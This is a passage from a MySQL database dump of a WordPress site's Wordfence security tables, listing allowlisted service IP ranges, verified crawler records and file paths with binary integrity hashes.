.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:5:{s:7:\"akismet\";s:5:\"4.1.9\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.8\";s:5:\"hello\";s:5:\"1.7.2\";s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";}','yes'),('wordpressThemeVersions','a:4:{s:13:\"magazine-hoot\";s:6:\"1.9.15\";s:14:\"twentynineteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.7\";s:15:\"twentytwentyone\";s:3:\"1.3\";}','yes'),('wordpressVersion','5.7.2','yes'),('wp_home_url','https://ashbooks.co.uk','yes'),('wp_site_url','https://ashbooks.co.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��#��','i��| ��OoD!���','verified',1629201733,''),('\0\0\0\0\0\0\0\0\0\0��#��','�����>�b0�oQ1��','badPTR',1629201732,'223.23.187.35.bc.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0��-���','i��| ��OoD!���','verified',1629529598,''),('\0\0\0\0\0\0\0\0\0\0��-���','�����>�b0�oQ1��','badPTR',1629529597,'webhostserver1.dalmaragency.com'),('\0\0\0\0\0\0\0\0\0\0��Bf[','�����>�b0�oQ1��','verified',1629362780,'google-proxy-66-102-8-91.google.com'),('\0\0\0\0\0\0\0\0\0\0��B�@\Z','�����>�b0�oQ1��','verified',1629476121,'crawl-66-249-64-26.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@','�����>�b0�oQ1��','verified',1629462313,'crawl-66-249-64-27.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1629462075,'crawl-66-249-64-196.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1629459605,'crawl-66-249-64-199.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1629458573,'crawl-66-249-64-201.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BT','�����>�b0�oQ1��','verified',1629142496,'crawl-66-249-66-84.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BX','�����>�b0�oQ1��','verified',1629721240,'crawl-66-249-66-88.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BY','�����>�b0�oQ1��','verified',1629723468,'crawl-66-249-66-89.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BZ','�����>�b0�oQ1��','verified',1629724737,'crawl-66-249-66-90.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B]','�����>�b0�oQ1��','verified',1629131834,'crawl-66-249-66-93.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B^','�����>�b0�oQ1��','verified',1629134730,'crawl-66-249-66-94.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B_','�����>�b0�oQ1��','verified',1629131836,'crawl-66-249-66-95.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629381149,'crawl-66-249-72-136.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629291597,'crawl-66-249-72-196.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629293958,'crawl-66-249-72-209.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629299119,'crawl-66-249-72-211.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629295266,'crawl-66-249-72-213.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1629319324,'crawl-66-249-73-183.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K','�����>�b0�oQ1��','verified',1629301969,'crawl-66-249-75-2.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K','�����>�b0�oQ1��','verified',1629290586,'crawl-66-249-75-4.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K\Z','�����>�b0�oQ1��','verified',1629304774,'crawl-66-249-75-26.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K','�����>�b0�oQ1��','verified',1629305315,'crawl-66-249-75-31.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K3','�����>�b0�oQ1��','verified',1629371883,'crawl-66-249-75-51.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K5','�����>�b0�oQ1��','verified',1629364703,'crawl-66-249-75-53.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K7','�����>�b0�oQ1��','verified',1629368482,'crawl-66-249-75-55.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�[�','�����>�b0�oQ1��','verified',1629320050,'rate-limited-proxy-66-249-91-154.google.com'),('\0\0\0\0\0\0\0\0\0\0��B�[�','�����>�b0�oQ1��','verified',1629309217,'rate-limited-proxy-66-249-91-155.google.com'),('\0\0\0\0\0\0\0\0\0\0��h�FX','i��| ��OoD!���','verified',1629677423,''),('\0\0\0\0\0\0\0\0\0\0��h�FX','�����>�b0�oQ1��','badPTR',1629677423,'88.70.199.104.bc.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0����`M','i��| ��OoD!���','verified',1629583879,''),('\0\0\0\0\0\0\0\0\0\0����`M','�����>�b0�oQ1��','badPTR',1629583879,'77.96.211.130.bc.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0����a','i��| ��OoD!���','verified',1629256565,''),('\0\0\0\0\0\0\0\0\0\0����a','�����>�b0�oQ1��','badPTR',1629256564,'209.250.254.97.vultr.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��޻�T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��)�\\�w�s����}\0','�9)�>�[	�\0b|�WC����L���#�+�','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�׌�/��IR','f�?���(��m�������Zn�ҳ���h;ފ','',0,'?'),('\0�e�Wl<�b&©VҴ','wp-content/themes/magazine-hoot/hybrid/inc/template-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������@�I�V\\��',' &�38�C�=$>�b�Y\\��V�)\r�T�r�','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'׊�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('\0���ѿ��)����\'','wp-content/themes/magazine-hoot/include/admin/images/page-header.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ry=DעhdH','��t�H���رl��\ZY�Ԑ0�:\nF��W4�','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k”���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�虚-�.�\Z��2	�','޻O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('��Kn����[�U�','wp-content/themes/magazine-hoot/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u\\@�oμ7\n2P�','W����z�H����*awT�c���B�~��=t','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('qY\"7�6�oEN��\r','wp-content/themes/magazine-hoot/hybrid/inc/class-media-grabber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&����zr=��D\n��','����X�\Z���c\'���V��\'�NՑ@�E%I}','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('���)����}/\"�','wp-content/themes/magazine-hoot/include/hoot-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�E�4@�e7��','��yJ���Ä,�8V�&	��EB��`�E��\n','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('\'pw��_d4ע�\r�H','wp-content/themes/magazine-hoot/hybrid/css/one-five.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>j�FX7\ZO|�\Z^���','����T�\"]ô?��s��	�\\`�*7����m��','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R	��p<#~%7','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('xp���س�\0���f��','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-sortlist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{$�ؠE��2���',')g���!�x͵\0�k؛�%m�:��ٳ�BP','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('�2�R�W$U8�\r���1','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6~�\\��O�����\\I�','��n�6�����AD�t�c����E=����','',0,'?'),('��pCy�)�	�{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r	������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1O��2e1����rJ�j','#T�c��x�E��ƒy�ũ��H���>��','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����3p����ǵ�P','A�j�Ⱦf�F���F�]��0=�޹�|���','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A؂Gd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('�&�o�W�QF��','wp-content/themes/magazine-hoot/include/admin/images/pageheader-incontent.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?��T�|e��`�','�/�,���@���෵z��dv�F��u�L7\"�','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('q���_\"